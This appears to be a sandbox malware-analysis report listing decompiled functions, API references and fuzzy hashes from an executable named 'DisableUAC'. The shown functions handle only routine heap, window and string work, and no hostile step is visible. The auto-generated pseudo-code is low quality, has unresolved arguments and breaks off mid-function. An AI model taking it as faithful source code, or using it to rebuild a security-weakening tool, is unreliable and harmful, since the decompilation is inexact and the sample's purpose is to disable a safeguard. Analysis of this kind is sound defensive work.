Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: File$AllocCreateHeapWrite
String ID: 2zlp
API String ID: 336457558-3142407975
Opcode ID: 41d7af89d60d3cc12da8eb96470d30f1fd22126f365d8e60568227bbf90251a9
Instruction ID: f6ae442ec71433ef1a66af1c0b14893775f8a3128dd7d26f58e03f4f5f916977
Opcode Fuzzy Hash: 41d7af89d60d3cc12da8eb96470d30f1fd22126f365d8e60568227bbf90251a9
Instruction Fuzzy Hash: 9F112B72204B8586DB11CF12F844789B7A0F78CBE8F888225AB9D47BA8DB7DC545CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000B304 Relevance: 6.4, APIs: 5, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 000000014000B3B1
HeapAlloc.KERNEL32 ref: 000000014000B3D6
memmove.MSVCRT ref: 000000014000B43D
HeapFree.KERNEL32 ref: 000000014000B484
HeapFree.KERNEL32 ref: 000000014000B496

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Heap$AllocFree$memmove
String ID:
API String ID: 1136900549-0
Opcode ID: 6e4ae405f42fb56e93191430d247d2beedc83b1cf2b1384de2d93d7a8fbf30da
Instruction ID: 8629baf927f481bae0f132d6367788b5852c93e8378fe568c53c3a53b7490b31
Opcode Fuzzy Hash: 6e4ae405f42fb56e93191430d247d2beedc83b1cf2b1384de2d93d7a8fbf30da
Instruction Fuzzy Hash: FF4191B260875482E777DB27B8447E9A292FB8CBC0F694024BF494B7B5DE38CA41C741

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400137E8 Relevance: 6.4, APIs: 5, Instructions: 101
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E000000011400137E8(signed int __ecx, intOrPtr __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long _a8, intOrPtr _a16, intOrPtr _a24, signed int _a32) {
				void* __rbp;
				intOrPtr _t48;
				signed int _t50;
				signed int _t57;
				long long* _t70;
				long long* _t71;
				long long _t74;
				long long* _t75;
				long long _t84;
				long long _t87;
				void* _t91;
				long long _t92;
				intOrPtr* _t96;
				intOrPtr _t97;

				_a8 = __rbx;
				_a24 = r8d;
				_a16 = __edx;
				_t57 = r9d;
				_a32 = r9d & 0x00000003;
				_t91 = __rax + __rcx;
				_t50 = __ecx & 0x00000007;
				if (__eflags == 0) goto 0x40013821;
				_t70 = __rax - _t91;
				_t92 = _t91 + _t70;
				if ((r9b & 0x00000004) == 0) goto 0x400138f8;
				E00000001140013E2C(_t70, __rbx, 0x4001d5d0, 0x1400137c8);
				EnterCriticalSection(??);
				_t96 =  *0x4001d5a0; // 0x21a7770
				if (_t96 == 0) goto 0x40013875;
				if ( *((intOrPtr*)(_t96 + 0x18)) != _t92) goto 0x40013863;
				if ( *((intOrPtr*)(_t96 + 0x20)) == _t57) goto 0x40013868;
				_t97 =  *_t96;
				goto 0x40013852;
				 *((intOrPtr*)(_t97 + 0x24)) =  *((intOrPtr*)(_t97 + 0x24)) + 1;
				if ( *((intOrPtr*)(_t97 + 0x10)) != 0) goto 0x400138e6;
				r8d = 0x1400137f0;
				HeapAlloc(??, ??, ??);
				_t74 = _t70;
				if (_t70 == 0) goto 0x400138e6;
				r8d = _a24;
				r9d = _t57;
				r9d = r9d & 0xfffffffb;
				E000000011400137E8(_t50, _a16, _t70, _t70, _t74, _t92 - 8);
				if (_t70 == 0) goto 0x400138e6;
				_t87 =  *0x4001d5a0; // 0x21a7770
				 *((long long*)(_t70 + 0x10)) = _t74;
				 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
				 *((long long*)(_t74 + 0x10)) = _t70;
				 *((long long*)(_t74 + 0x18)) = _t92;
				 *(_t74 + 0x20) = _t57;
				 *((intOrPtr*)(_t74 + 0x24)) = 1;
				 *_t74 = _t87;
				if (_t87 == 0) goto 0x400138df;
				 *((long long*)(_t87 + 8)) = _t74;
				 *0x4001d5a0 = _t74;
				LeaveCriticalSection(??);
				_t71 = _t70;
				goto 0x40013952;
				_t84 =  *0x4001caa0; // 0x21a0000
				_t27 = _t87 + 0x60; // 0x60
				r8d = _t27;
				HeapAlloc(??, ??, ??);
				_t75 = _t71;
				if (_t71 == 0) goto 0x4001394f;
				 *_t71 = _t84;
				 *((long long*)(_t71 + 8)) = _t84;
				 *((long long*)(_t71 + 0x10)) = _t84;
				 *((long long*)(_t75 + 0x20)) = _t92;
				 *((intOrPtr*)(_t75 + 0x28)) = _a16;
				_t48 = _a24;
				 *((intOrPtr*)(_t75 + 0x2c)) = _t48;
				if (_a32 != 1) goto 0x4001394c;
				 *((intOrPtr*)(_t75 + 0x30)) = 1;
				InitializeCriticalSection(??);
				goto 0x4001394f;
				 *((intOrPtr*)(_t75 + 0x30)) = 0;
				return _t48;
			}

0x1400137e8
0x1400137ed
0x1400137f2
0x140013802
0x140013808
0x14001380f
0x140013816
0x140013819
0x14001381b
0x14001381e
0x140013825
0x140013839
0x140013845
0x14001384b
0x140013855
0x14001385b
0x140013861
0x140013863
0x140013866
0x14001386c
0x140013873
0x14001387e
0x140013882
0x140013888
0x14001388e
0x140013890
0x140013899
0x1400138a0
0x1400138a4
0x1400138af
0x1400138b1
0x1400138b8
0x1400138bc
0x1400138c1
0x1400138c5
0x1400138c9
0x1400138cc
0x1400138d3
0x1400138d9
0x1400138db
0x1400138df
0x1400138ed
0x1400138f3
0x1400138f6
0x1400138f8
0x140013901
0x140013901
0x140013905
0x14001390d
0x140013913
0x14001391a
0x14001391d
0x140013921
0x140013929
0x14001392d
0x140013930
0x140013934
0x140013937
0x14001393d
0x140013944
0x14001394a
0x14001394c
0x14001395e

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140013845
HeapAlloc.KERNEL32 ref: 0000000140013882
LeaveCriticalSection.KERNEL32 ref: 00000001400138ED
HeapAlloc.KERNEL32 ref: 0000000140013905
InitializeCriticalSection.KERNEL32 ref: 0000000140013944

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CriticalSection$AllocHeap$EnterInitializeLeave
String ID:
API String ID: 2544007295-0
Opcode ID: fcbeaba7243f154b0132b0d42fbae756052479d7d7d1cfc70235967ceda60aed
Instruction ID: a98e50154e1da126bc7af7533a51125fcf2a78ecd1433878bad4a3144ffa10bf
Opcode Fuzzy Hash: fcbeaba7243f154b0132b0d42fbae756052479d7d7d1cfc70235967ceda60aed
Instruction Fuzzy Hash: DE414872204B1086EB16CF16E84079977B5F74CBD8F54412AEB894B7A8EF7AC895C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000A718 Relevance: 6.3, APIs: 5, Instructions: 26COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 000000014000A724
CloseHandle.KERNEL32 ref: 000000014000A733
CloseHandle.KERNEL32 ref: 000000014000A742
CloseHandle.KERNEL32 ref: 000000014000A751
EnterCriticalSection.KERNEL32 ref: 000000014000A75E

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CloseHandle$CriticalEnterSection
String ID:
API String ID: 2385207105-0
Opcode ID: f2ab4f1d2508b0961bacd9b457adf2a3aa67c8454d11a3bf61054ceb0536283d
Instruction ID: 7bbc6fc69e7a0ada637ee62f2f3c610c2fe528801e918caf6db88923467602db
Opcode Fuzzy Hash: f2ab4f1d2508b0961bacd9b457adf2a3aa67c8454d11a3bf61054ceb0536283d
Instruction Fuzzy Hash: D9F0A47530990481EF1AEF67ECA43B52370AB9DBC4F084422AB4E4B674CF7AC949C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000DC90 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 000000014000DD2D
DestroyAcceleratorTable.USER32 ref: 000000014000DD97
CreateAcceleratorTableA.USER32 ref: 000000014000DDA4

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AcceleratorTable$AllocCreateDestroyHeap
String ID:
API String ID: 1117254962-0
Opcode ID: 88a3ede8dd2ff275601157a7e71a41743344961eed123107cea82acbbc32f74c
Instruction ID: 4c6b71da745ddbe1ec1f90225f85d56629876943e0c9334879e65b2f7e1c534e
Opcode Fuzzy Hash: 88a3ede8dd2ff275601157a7e71a41743344961eed123107cea82acbbc32f74c
Instruction Fuzzy Hash: ED314872600A5482EB26CF2AE4807AC77B0FB9CF84F868116EB4E47769DB34C941C760

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140006DD0 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

CharLowerA.USER32 ref: 0000000140006DF9
CharLowerA.USER32 ref: 0000000140006E2D
CharLowerA.USER32 ref: 0000000140006E5D
CharLowerA.USER32 ref: 0000000140006E68

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: 59f7e99b2d6b6df5e7de2f83d50eb2288df540f227d11ec2111cd9af7b9197d4
Instruction ID: fb88164da882d9331da6d2c708c3fb82a4c2856b9cd4b63fdaad59eeed7e3f8f
Opcode Fuzzy Hash: 59f7e99b2d6b6df5e7de2f83d50eb2288df540f227d11ec2111cd9af7b9197d4
Instruction Fuzzy Hash: 7911E1762046E881DA538F33E9103BABAE2F74CBE5F1C4215FFA6076E1CE38C8458210

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000E788 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

IsWindowEnabled.USER32 ref: 000000014000E7A2
IsWindowVisible.USER32 ref: 000000014000E7AF
GetWindowLongPtrA.USER32 ref: 000000014000E7BF
SetFocus.USER32 ref: 000000014000E7DA

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Window$EnabledFocusLongVisible
String ID:
API String ID: 599048109-0
Opcode ID: e617e1a2f445b0acb5d706a8f63a6d39f2f187dd190d614b5994b722b552d786
Instruction ID: c2f68107a21cde57c3b6c9012c22f2dc5be6cbced527da71faf62a3ab6d198b0
Opcode Fuzzy Hash: e617e1a2f445b0acb5d706a8f63a6d39f2f187dd190d614b5994b722b552d786
Instruction Fuzzy Hash: F901317260868481EB16CF57F9503A963A4F74CFC4F084155FB4957764DF38C450C791

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000A0F8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000000014000A105
GetCurrentProcess.KERNEL32 ref: 000000014000A10E
DuplicateHandle.KERNEL32 ref: 000000014000A134
CloseHandle.KERNEL32 ref: 000000014000A141

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicate
String ID:
API String ID: 1410216518-0
Opcode ID: 19ea12daaef2fe522b1e707db4f6850bf523a530efa627ee1231c3a09b45384e
Instruction ID: 70c2433b369e08e5123154a1a465a6b9eccebef32b6dee88858cf74f6ab72087
Opcode Fuzzy Hash: 19ea12daaef2fe522b1e707db4f6850bf523a530efa627ee1231c3a09b45384e
Instruction Fuzzy Hash: DFF030B6218B4082E7009F52F984399B3A0F74CBE5F484014EF4907B68CFBCC554CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000C724 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E0000000114000C724(intOrPtr __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24, intOrPtr _a40, intOrPtr _a48, signed int _a56) {
				void* _v24;
				signed long long _v32;
				long long _v40;
				signed long long _v48;
				long long _v56;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				void* __rdi;
				void* _t24;
				intOrPtr* _t42;
				long long _t49;
				signed int _t50;
				intOrPtr _t57;
				intOrPtr _t59;
				void* _t73;
				signed long long _t78;
				signed long long _t79;

				_t42 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t57 =  *0x4001d870; // 0x21a3400
				E0000000114001374C(_t24, _t57);
				if ( *0x4001d280 != 0) goto 0x4000c7d7;
				r13d = 0x140;
				r8d = r13d;
				 *0x4001d280 = 1;
				memset(??, ??, ??);
				 *0x4001d140 = 3;
				 *0x4001d258 = 0x14000c538;
				 *0x4001d144 = r13d;
				 *0x4001d148 = 0x14000c698;
				 *0x4001d228 = 0x4000d0fc;
				 *0x4001d230 = 0x4000d164;
				 *0x4001d150 = 0x4000d180;
				r9d = _a56;
				_t73 =  !=  ? _a48 : 0x400196e6;
				_v32 = _v32 & 0x00000000;
				_t49 =  *0x4001caa8; // 0x140000000
				_v40 = _t49;
				_t50 =  *_t42;
				_t79 = _t78 | 0xffffffff;
				r9d = r9d | 0x50020080;
				_v48 = _t79;
				_v56 = _t50;
				_v64 = _a40;
				_v72 = r9d;
				_v80 = r8d;
				_v88 = __edx;
				CreateWindowExA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
				if (_t50 == 0) goto 0x4000c887;
				_t59 =  *0x4001d860; // 0x21a3220
				E000000011400135C4(_t50, _t50, _t59, __rcx);
				 *(_t50 + 0x28) = _t79;
				 *(_t50 + 0x20) = _t79;
				return E0000000114000D2B8(_t50, __rcx, _t50, __rcx, __rsi, _t50, 0x4001d140);
			}

0x14000c724
0x14000c724
0x14000c729
0x14000c72e
0x14000c73f
0x14000c74e
0x14000c75d
0x14000c75f
0x14000c76e
0x14000c771
0x14000c77b
0x14000c787
0x14000c791
0x14000c79f
0x14000c7a6
0x14000c7b4
0x14000c7c2
0x14000c7d0
0x14000c7df
0x14000c7fb
0x14000c7ff
0x14000c805
0x14000c80c
0x14000c811
0x14000c818
0x14000c822
0x14000c829
0x14000c82e
0x14000c83a
0x14000c83e
0x14000c842
0x14000c846
0x14000c84a
0x14000c856
0x14000c858
0x14000c862
0x14000c877
0x14000c87b
0x14000c8a3

APIs

memset.MSVCRT ref: 000000014000C77B
CreateWindowExA.USER32 ref: 000000014000C84A

Strings

Static, xrefs: 000000014000C7F4

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CreateWindowmemset
String ID: Static
API String ID: 1730425660-2272013587
Opcode ID: 6ca151233a44aa2d25c8c8b8470266631e5a8ac33f3dff3927824fbb2504e5a5
Instruction ID: 1136a26aa95b934fea457191f14ca3c9b9c47a235958229a2112d3e50080d8ae
Opcode Fuzzy Hash: 6ca151233a44aa2d25c8c8b8470266631e5a8ac33f3dff3927824fbb2504e5a5
Instruction Fuzzy Hash: 2541E275215B84A5E752CB02F8807C677A4F78CBD4F54022AEA9C4BBB5DB7DC144C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000CE6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0000000114000CE6C(intOrPtr __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, intOrPtr _a40, intOrPtr _a48, signed int _a56) {
				void* _v8;
				signed long long _v16;
				long long _v24;
				signed long long _v32;
				long long _v40;
				intOrPtr _v48;
				signed int _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				void* _t26;
				intOrPtr* _t42;
				long long _t47;
				signed int _t48;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr* _t69;
				void* _t73;
				void* _t77;

				_t42 = _t69;
				 *((long long*)(_t42 + 8)) = __rbx;
				 *((long long*)(_t42 + 0x10)) = __rbp;
				 *((long long*)(_t42 + 0x18)) = __rsi;
				 *((long long*)(_t42 + 0x20)) = __rdi;
				_t55 =  *0x4001d870; // 0x21a3400
				E0000000114001374C(_t26, _t55);
				if ( *0x4001d530 != 0) goto 0x4000cf04;
				r8d = 0x140;
				memset(_t77, ??);
				r11d = 1;
				 *0x4001d408 = 0x14000cd14;
				 *0x4001d3f0 = r11d;
				 *0x4001d410 = 0x14000ccf4;
				 *0x4001d3f4 = 0x140;
				 *0x4001d508 = 0x14000cd34;
				 *0x4001d530 = r11d;
				r9d = _a56;
				_t73 =  !=  ? _a48 : 0x400196e6;
				_v16 = _v16 & 0x00000000;
				_t47 =  *0x4001caa8; // 0x140000000
				_v24 = _t47;
				_v32 = _v32 | 0xffffffff;
				_t48 =  *_t42;
				_v40 = _t48;
				r9d = r9d | 0x50030000;
				_v48 = _a40;
				_v56 = r9d;
				_v64 = r8d;
				_v72 = __edx;
				CreateWindowExA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
				if (_t48 == 0) goto 0x4000cf9f;
				_t57 =  *0x4001d860; // 0x21a3220
				E000000011400135C4(_t48, _t48, _t57, __rcx);
				return E0000000114000D2B8(_t48, __rcx, _t48, __rcx, __rsi, _t48, 0x4001d3f0);
			}

0x14000ce6c
0x14000ce6f
0x14000ce73
0x14000ce77
0x14000ce7b
0x14000ce88
0x14000ce97
0x14000cea6
0x14000ceb1
0x14000ceb7
0x14000cec3
0x14000cec9
0x14000ced7
0x14000cede
0x14000ceec
0x14000cef6
0x14000cefd
0x14000cf0c
0x14000cf25
0x14000cf29
0x14000cf2f
0x14000cf36
0x14000cf3b
0x14000cf41
0x14000cf45
0x14000cf51
0x14000cf58
0x14000cf5c
0x14000cf62
0x14000cf66
0x14000cf6a
0x14000cf76
0x14000cf78
0x14000cf82
0x14000cfbc

APIs

memset.MSVCRT ref: 000000014000CEB7
CreateWindowExA.USER32 ref: 000000014000CF6A

Strings

Button, xrefs: 000000014000CF1E

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CreateWindowmemset
String ID: Button
API String ID: 1730425660-1034594571
Opcode ID: e52b17a98b7216cabf93ecb96549453190464406c7fee966dcacce7e0437e6e9
Instruction ID: eb5f7e2949339bfe7f6c7f49e8728803a1327b18aa4fdcddb7d2907bddabcfd0
Opcode Fuzzy Hash: e52b17a98b7216cabf93ecb96549453190464406c7fee966dcacce7e0437e6e9
Instruction Fuzzy Hash: A73103B1215B8486EB12DF16E8407CAB7A5F74CBD4F44422ABB9C4B7B5DB3AC540C741

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000DF04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetPropA.USER32 ref: 000000014000DF3B
GetWindowLongPtrA.USER32 ref: 000000014000DF4C

Strings

PB_ID, xrefs: 000000014000DF34

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: LongPropWindow
String ID: PB_ID
API String ID: 2492497586-4173770792
Opcode ID: 22d1085c88ac1f10f89286fad7521f26ebd31c6ee3eb8b2aa5d3b7f33ef20a1e
Instruction ID: f14740a2f121803f6a212ba14328f67bb843d778855ada4b11944220fc5d1563
Opcode Fuzzy Hash: 22d1085c88ac1f10f89286fad7521f26ebd31c6ee3eb8b2aa5d3b7f33ef20a1e
Instruction Fuzzy Hash: 3B11FA65705B9585EA11DB17B85079AB7A0BB9CFE0F488622BE5D077A8EF38C442C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140009E04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140014840: HeapReAlloc.KERNEL32 ref: 00000001400148A7

GetModuleFileNameA.KERNEL32 ref: 0000000140009E31
memmove.MSVCRT(?,?,?,0000000140002CD0,?,?,?,?,?,00000000,00000000,00000000,02370A20,0000000140004F6A), ref: 0000000140009E59

Strings

\\?\, xrefs: 0000000140009E37

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AllocFileHeapModuleNamememmove
String ID: \\?\
API String ID: 2277450838-4282027825
Opcode ID: 1afaf4f2862a2c9b44ccf1c92119b4434692e40668d56364d019c50435eeb721
Instruction ID: 9aae9cc9a996b1b26fabcae87d2e53531a88413af8238371b4803e75f2b99594
Opcode Fuzzy Hash: 1afaf4f2862a2c9b44ccf1c92119b4434692e40668d56364d019c50435eeb721
Instruction Fuzzy Hash: F3F0C87171469042EB019B27F8C03AA5691A78DBC4F485124FB594F7BADF79C8828300

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000D3C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 000000014000D37C: GetParent.USER32 ref: 000000014000D3A6

GetPropA.USER32 ref: 000000014000D3E8
GetWindowLongPtrA.USER32 ref: 000000014000D3F9

Part of subcall function 0000000140011840: EnterCriticalSection.KERNEL32 ref: 0000000140011890

Strings

PB_WindowID, xrefs: 000000014000D3DE

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CriticalEnterLongParentPropSectionWindow
String ID: PB_WindowID
API String ID: 3316046851-1508741625
Opcode ID: a91c0b03bc44cb7360746b4115b50d1df35cdbb174f260d2ede32334a5700269
Instruction ID: 22cbb3b1c955b42fc50213a69b3fe2a7c07935c8609d534d6d3d8ac6fa5fc26c
Opcode Fuzzy Hash: a91c0b03bc44cb7360746b4115b50d1df35cdbb174f260d2ede32334a5700269
Instruction Fuzzy Hash: 8DF09AB2A08B8082EB10CB52F4443DAA760F78CBE4F448225BF490BBA9CF7CC245C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000D438 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E0000000114000D438(void* __edx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				struct HBRUSH__* _t19;
				long long _t31;
				long long _t35;
				struct _CRITICAL_SECTION* _t49;
				long long _t50;
				long long _t53;
				intOrPtr* _t62;
				intOrPtr _t63;

				_t31 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				E0000000114000D37C(__rax, __rbx, __rcx);
				GetPropA(??, ??);
				__imp__GetWindowLongPtrA();
				_t35 = _a8;
				_t53 = _a16;
				_pop(_t49);
				goto E00000001140011A64;
				asm("int3");
				asm("int3");
				_a8 = _t35;
				_a16 = _t53;
				EnterCriticalSection(_t49);
				_t62 =  *0x4001d538; // 0x0
				goto 0x4000d4ca;
				if ( *((intOrPtr*)(_t62 + 0x10)) == 0x332c) goto 0x4000d4d1;
				_t63 =  *_t62;
				if (_t63 != 0) goto 0x4000d4c1;
				goto 0x4000d4de;
				 *((intOrPtr*)(_t63 + 0x20)) =  *((intOrPtr*)(_t63 + 0x20)) + 1;
				if ( *((intOrPtr*)(_t63 + 0x18)) != 0) goto 0x4000d50f;
